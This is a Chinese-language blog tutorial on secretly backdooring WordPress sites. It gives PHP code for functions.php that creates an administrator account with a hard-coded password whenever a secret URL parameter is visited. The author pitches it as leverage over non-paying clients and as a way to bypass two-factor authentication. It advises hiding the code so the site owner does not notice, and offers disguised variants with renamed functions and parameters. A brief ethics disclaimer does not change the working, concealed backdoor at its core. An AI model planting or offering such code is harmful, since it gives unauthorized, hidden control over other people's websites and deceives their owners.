如何创建对 WordPress 的秘密后门管理员访问权限

已发表: 2022-09-15

您是否曾经为您的客户创建了 WordPress 网站或提供服务但没有获得报酬? 如果这听起来很熟悉,那么您来对了地方。

为了保护自己免受这种情况的影响,您可能会发现了解如何在 WordPress 中创建秘密后门网站访问非常有用。

此外,如果由于任何原因您无法访问您的 WordPress 网站,那么拥有替代后门访问权限以重新获得控制权会非常有用!

在本教程中,我将讨论秘密后门网站访问权限以及创建此类访问权限的原因,以确保您始终可以访问您的网站。

最后,我将向您展示如何创建一个分步指南和一条道德建议。

目录
  1. 什么是 WordPress 中的秘密后门管理员访问权限?
  2. 创建后门网站访问的根本原因是什么?
  3. 关于创建后门网站访问的道德建议
  4. WordPress密码后门是如何工作的?
  5. 如何创建秘密后门网站访问
    • 第 1 步:从主题文件编辑器中打开 functions.php 文件
    • 第 2 步:将以下代码复制并粘贴到 functions.php 文件中
    • 第 3 步:使用自定义参数构造 URL 以获取管理员访问权限
    • 专业提示:偷偷摸摸,伪装后门
  6. 现在轮到你了!

什么是 WordPress 中的秘密后门管理员访问权限?

秘密后门网站访问

正如术语所暗示的那样,如果您通常的登录不起作用,后门访问是一种重新获得对 WordPress 网站的管理员访问权限的方法。

想知道如何丢失您的管理员帐户?

如果您是 WordPress 开发人员或代理商,您可能会发现客户在您完成工作后会删除您的管理员帐户,以便在他们不付款时保护网站。

在最坏的情况下,黑客可能会未经授权访问您的网站并更改管理员密码或完全删除登录名。

如果发生这种情况,您需要一种重新获得访问权限的方法。 这就是秘密后门发挥作用的地方。

创建后门网站访问的根本原因是什么?

创建 WordPress 网站的秘密后门管理员访问权限有几个潜在原因:

  • 在客户未付款的情况下重新获得管理员访问权限
  • 如果网站被黑客入侵并更改管理员帐户详细信息,以保持访问权限
  • 无需记住用户名或密码即可轻松访问管理面板。
  • 绕过可能存在的安全措施,例如双因素身份验证。
  • 允许其他人在不知道您使用的原始密码的情况下访问该网站。
  • 难以或不方便记住用户名或密码的情况下,创建秘密后门管理员访问权限可能会有所帮助。

但是,创建后门也可能存在安全风险,因为它会绕过任何可能实施的安全措施。

因此,我建议在创建秘密后门管理员访问权限之前权衡利弊。

关于创建后门网站访问的道德建议

创建对他人网站的秘密后门访问存在道德问题。 在创建一个之前,这绝对是要考虑的事情。

无论原因多么合理,您都在弄乱别人的财产(一旦他们支付了费用),因此如果您打算添加后门,请考虑后果。

我敦促您不要在网站上添加后门,除非别无选择。 我不对此类行为负责。 我只建议出于合法或合法原因使用它。

WordPress密码后门是如何工作的?

WordPress 后门通过在核心 WordPress 文件中使用 PHP 来工作。 我稍后将分享的代码将在您访问特定 URL 时创建一个新的管理员帐户。

创建后,您将能够登录您的网站并执行您需要的任何任务。

当您在 functions.php 中注册 PHP 代码片段时,您就可以使用带有自定义查询的 URL 来触发它了。 URL 包含您在编辑 functions.php 文件时插入的关键字。

现在,您可能想知道在触发该功能之前秘密帐户是否存在。

答案是不”。 只有在您使用包含特定参数的 URL 触发该功能后,才会创建您的新用户帐户。

如何创建秘密后门网站访问

以下过程涉及修改 PHP 文件。 这是非常安全的,但你需要确保你第一次就做对了。

完全按照这些说明进行操作,您会没事的!

为防止任何潜在问题,我建议通过您的子主题编辑 functions.php 文件。 如果您使用的是 Astra 主题,只需单击一下即可创建子主题。

第 1 步:从主题文件编辑器中打开 functions.php 文件

我们将修改 functions.php 文件,这是一个核心 WordPress 文件。

  • 导航到您的 WordPress 管理仪表板。
  • 转到外观 > 主题文件编辑器。
转到外观 > 主题文件编辑器
  • 现在,从右侧边栏中选择functions.php文件。
打开functions.php

第 2 步:将以下代码复制并粘贴到 functions.php 文件中

现在,您需要做的就是将此 PHP 代码片段复制并粘贴到编辑器中。

 add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

您将从代码中看到它将创建一个名为“ mr_admin ”的新管理员用户,密码为“ pa55w0rd! '。

您可以根据需要更改这些。

  • 将代码放在 PHP 文件中的任何位置。 理想情况下,在其他功能之间。 您不想让站点管理员或管理员知道您正在注入此代码,对吗? 所以,我将它粘贴在文档的中下部分。
  • 此外,请确保您将代码粘贴在/**上方或*/标记之后。
将代码粘贴在 /** 上方或 */ 标记之后
  • 点击“更新文件”按钮。
点击更新文件按钮

现在,该文件应该得到更新并且您的后门已经到位。

文件编辑成功

第 3 步:使用自定义参数构造 URL 以获取管理员访问权限

现在,当您需要触发该功能或尝试获得管理员访问权限时,请确保在域的右侧添加以下 slug:

/?backdoor=go

[这里,后门是关键字GET之后的查询参数]。 更具体地说,请看以下屏幕截图:

函数关键字

因此,如果您的网站是www.xyz.com ,则后门访问 URL 将为“ www.xyz.com/?backdoor=go ”。

在域名旁边添加 slug 后,按 Enter。

使用参数触发函数

砰! 就这么简单!

现在,从Users > All Users检查您的新管理员用户帐户。

新的秘密用户帐户

专业提示:偷偷摸摸,伪装后门

提示 1:更改参数和函数名称

您可以根据需要更改代码片段的函数名称、参数。

这样,您可以用伪装来伪装自己。 这是我将关键字“ backdoor ”更改为“ pathway ”的伪装代码片段:

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'mr_admin' ) ) { $user_id = wp_create_user( 'mr_admin', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

这意味着您的www.xyz.com网址将变为“ www.xyz.com/?pathway=go ”。

提示 2:更改用户名

要更改用户名,请将字符串“ mr_admin ”替换为“ hellboy

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

提示 3:更改密码

要更改密码,请替换关键字“ pa55w0rd! ” 和 “地狱通行证! ”。

 add_action( 'wp_head', 'my_pathway' ); function my_pathway() { if ( md5( $_GET['pathway'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'hellboy' ) ) { $user_id = wp_create_user( 'hellboy', 'hell_pass!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }

技巧 4:构建新的 URL 和 slug

因此,要触发该功能,您需要使用以下 URL 和关键字“ pathway ”:

www.xyz.com/?pathway=go

就是这样。 您现在已经创建了一个后门并练习了自定义设置以使其独一无二。!

现在轮到你了!

请记住,不应轻易添加秘密后门网站访问权限。 但是,如果你需要这样做,你现在知道怎么做。

无论您为什么需要重新访问网站,这都是最简单的方法之一。

如果您对这些步骤中的任何一个感到困惑,请随时在下面的评论部分给我留言。

您也可以加入我的 Facebook 社区,随时了解我的最新消息!